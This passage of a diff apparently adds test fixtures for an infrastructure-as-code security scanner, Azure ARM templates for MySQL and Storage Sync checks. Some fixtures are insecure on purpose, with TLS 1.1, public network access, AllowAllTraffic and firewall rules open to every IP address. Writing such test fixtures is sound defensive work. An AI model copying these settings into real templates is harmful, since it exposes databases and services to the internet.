"administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string" + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": {} + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.Sql/servers", + "apiVersion": "2023-05-01-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "identity": { + "type": "string", + "userAssignedIdentities": { + "{customized property}": {} + } + }, + "properties": { + "administratorLogin": "string", + "administratorLoginPassword": "string", + "administrators": { + "administratorType": "ActiveDirectory", + "azureADOnlyAuthentication": "bool", + "login": "string", + "principalType": "string", + "sid": "string", + "tenantId": "string" + }, + "federatedClientId": "string", + "isIPv6Enabled": "string", + "keyId": "string", + "minimalTlsVersion": "1.2", + "primaryUserAssignedIdentityId": "string", + "publicNetworkAccess": "string", + "restrictOutboundNetworkAccess": "string", + "version": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json new file mode 100644 index 00000000000..af482998d76 --- /dev/null +++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json @@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", + "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_1", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + ] + } + ], + "outputs": { + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "name": { + "type": "string", + "value": "[parameters('serverName')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json new file mode 100644 index 00000000000..a464424d13c --- /dev/null +++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/pass.json @@ -0,0 +1,257 @@ + +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "1923296876861958074" + } + }, + "parameters": { + "serverName": { + "type": "string", + "metadata": { + "description": "Server Name for Azure database for MySQL" + } + }, + "administratorLogin": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Database administrator login name" + } + }, + "administratorLoginPassword": { + "type": "securestring", + "minLength": 8, + "metadata": { + "description": "Database administrator password" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)" + } + }, + "skuName": { + "type": "string", + "defaultValue": "GP_Gen5_2", + "metadata": { + "description": "Azure database for MySQL sku name " + } + }, + "SkuSizeMB": { + "type": "int", + "defaultValue": 5120, + "metadata": { + "description": "Azure database for MySQL Sku Size " + } + }, + "SkuTier": { + "type": "string", + "defaultValue": "GeneralPurpose", + "allowedValues": [ + "Basic", + "GeneralPurpose", + "MemoryOptimized" + ], + "metadata": { + "description": "Azure database for MySQL pricing tier" + } + }, + "skuFamily": { + "type": "string", + "defaultValue": "Gen5", + "metadata": { + "description": "Azure database for MySQL sku family" + } + }, + "mysqlVersion": { + "type": "string", + "defaultValue": "8.0", + "allowedValues": [ + "5.6", + "5.7", + "8.0" + ], + "metadata": { + "description": "MySQL version" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "backupRetentionDays": { + "type": "int", + "defaultValue": 7, + "metadata": { + "description": "MySQL Server backup retention days" + } + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": "Disabled", + "metadata": { + "description": "Geo-Redundant Backup setting" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "azure_mysql_vnet", + "metadata": { + "description": "Virtual Network Name" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "azure_mysql_subnet", + "metadata": { + "description": "Subnet Name" + } + }, + "virtualNetworkRuleName": { + "type": "string", + "defaultValue": "AllowSubnet", + "metadata": { + "description": "Virtual Network RuleName" + } + }, + "vnetAddressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Virtual Network Address Prefix" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Subnet Address Prefix" + } + } + }, + "variables": { + "firewallrules": [ + { + "Name": "rule1", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + }, + { + "Name": "rule2", + "StartIpAddress": "0.0.0.0", + "EndIpAddress": "255.255.255.255" + } + ] + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers/virtualNetworkRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), parameters('virtualNetworkRuleName'))]", + "properties": { + "virtualNetworkSubnetId": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "ignoreMissingVnetServiceEndpoint": true + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]", + "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]" + ] + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2023-09-01", + "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_2", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + ] + } + ], + "outputs": { + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "name": { + "type": "string", + "value": "[parameters('serverName')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json new file mode 100644 index 00000000000..b42eb25b0b6 --- /dev/null +++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail1.json @@ -0,0 +1,23 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.StorageSync/storageSyncServices", + "apiVersion": "2021-02-01", + "name": "fail1", + "properties": { + "storageSyncServiceStatus": "Registered", + "storageSyncServiceProperties": { + "trustState": "Enabled", + "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4", + "provisioningState": "Succeeded" + }, + "location": "East US", + "tags": { + "foo": "bar" + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json new file mode 100644 index 00000000000..07ca8e384a8 --- /dev/null +++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/fail2.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.StorageSync/storageSyncServices", + "apiVersion": "2021-02-01", + "name": "fail2", + "properties": { + "storageSyncServiceStatus": "Registered", + "storageSyncServiceProperties": { + "trustState": "Enabled", + "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4", + "provisioningState": "Succeeded" + }, + "location": "East US", + "incomingTrafficPolicy": "AllowAllTraffic", + "tags": { + "foo": "bar" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json new file mode 100644 index 00000000000..ade615191c3 --- /dev/null +++ b/tests/arm/checks/resource/example_StorageSyncPublicAccessDisabled/pass.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "apiVersion": "2021-02-01", + "name": "pass", + "properties": { + "storageSyncServiceStatus": "Registered", + "storageSyncServiceProperties": { + "trustState": "Enabled", + "storageSyncServiceUid": "65fdd65b-ea5d-4a00-bf7f-40c41ba39ae4", + "provisioningState": "Succeeded" + }, + "location": "East US", + "incomingTrafficPolicy": "AllowVirtualNetworksOnly", + "tags": { + "foo": "bar" + } + }, + "type": "Microsoft.StorageSync/storageSyncServices" + } + ] +} diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json new file mode 100644 index 00000000000..2f14c053353 --- /dev/null +++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/fail.json @@ -0,0 +1,250 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": true + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": { + "type": "AzureKeyVault", + "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike", + "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2" + } + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "{customized property}": "string", + "sku": { + "capacity": "int", + "family": "string", + "name": "string", + "size": "string", + "tier": "string" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "infrastructureEncryption": "string", + "minimalTlsVersion": "string", + "publicNetworkAccess": "enabled", + "sslEnforcement": "string", + "storageProfile": { + "backupRetentionDays": "int", + "geoRedundantBackup": "string", + "storageAutogrow": "string", + "storageMB": "int" + }, + "version": "string", + "createMode": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules", + "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]", + "apiVersion": "[parameters('firewallRulesAPIVersion')]", + "properties": { + "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]", + "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]" + } + } + ] + } + } + }, + { + "condition": "[parameters('aadEnabled')]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('addAdmins-', parameters('guid'))]", + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/administrators", + "name": "[concat(parameters('serverName'),'/ActiveDirectory')]", + "apiVersion": "[variables('api')]", + "properties": { + "administratorType": "[parameters('aadData').administratorType]", + "identityResourceId": "[parameters('aadData').identityResourceId]", + "login": "[parameters('aadData').login]", + "sid": "[parameters('aadData').sid]", + "tenantId": "[parameters('aadData').tenantId]" + } + } + ] + } + } + }, + { + "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "copy": { + "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]", + "mode": "serial", + "name": "serverParametersIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json new file mode 100644 index 00000000000..74538468f41 --- /dev/null +++ b/tests/arm/checks/resource/example_TestMySQLPublicAccessDisabled/pass.json @@ -0,0 +1,250 @@ +{ + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "apiVersion": { + "type": "string", + "defaultValue": "2021-05-01" + }, + "administratorLogin": { + "type": "string" + }, + "administratorLoginPassword": { + "type": "securestring" + }, + "location": { + "type": "string" + }, + "serverName": { + "type": "string" + }, + "serverEdition": { + "type": "string" + }, + "vCores": { + "type": "int", + "defaultValue": 4 + }, + "storageSizeGB": { + "type": "int" + }, + "haEnabled": { + "type": "string", + "defaultValue": "Disabled" + }, + "availabilityZone": { + "type": "string", + "defaultValue": "" + }, + "standbyAvailabilityZone": { + "type": "string" + }, + "version": { + "type": "string" + }, + "tags": { + "type": "object", + "defaultValue": {} + }, + "firewallRules": { + "type": "object", + "defaultValue": {} + }, + "backupRetentionDays": { + "type": "int" + }, + "geoRedundantBackup": { + "type": "string", + "defaultValue": true + }, + "vmName": { + "type": "string", + "defaultValue": "Standard_B1ms" + }, + "storageIops": { + "type": "int" + }, + "storageAutogrow": { + "type": "string", + "defaultValue": "Enabled" + }, + "autoIoScaling": { + "type": "string", + "defaultValue": "Disabled" + }, + "identityData": { + "type": "object", + "defaultValue": {} + }, + "dataEncryptionData": { + "type": "object", + "defaultValue": { + "type": "AzureKeyVault", + "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike", + "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2" + } + }, + "serverParameters": { + "type": "array", + "defaultValue": [] + }, + "aadEnabled": { + "type": "bool", + "defaultValue": false + }, + "aadData": { + "type": "object", + "defaultValue": {} + }, + "guid": { + "type": "string", + "defaultValue": "[newGuid()]" + }, + "network": { + "type": "object", + "defaultValue": {} + }, + "firewallRulesAPIVersion": { + "type": "string", + "defaultValue": "2022-01-01" + } + }, + "variables": { + "api": "[parameters('apiVersion')]", + "firewallRules": "[parameters('firewallRules').rules]", + "serverParameters": "[parameters('serverParameters')]" + }, + "resources": [ + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "{customized property}": "string", + "sku": { + "capacity": "int", + "family": "string", + "name": "string", + "size": "string", + "tier": "string" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "infrastructureEncryption": "string", + "minimalTlsVersion": "string", + "publicNetworkAccess": "disabled", + "sslEnforcement": "string", + "storageProfile": { + "backupRetentionDays": "int", + "geoRedundantBackup": "string", + "storageAutogrow": "string", + "storageMB": "int" + }, + "version": "string", + "createMode": "string" + } + }, + { + "condition": "[greater(length(variables('firewallRules')), 0)]", + "type": "Microsoft.Resources/deployments", + "apiVersion": "2019-08-01", + "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]", + "copy": { + "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]", + "mode": "Serial", + "name": "firewallRulesIterator" + }, + "dependsOn": [ + "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]", + "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]" + ], + "properties": { + "mode": "Incremental", + "template": { + "$schema": 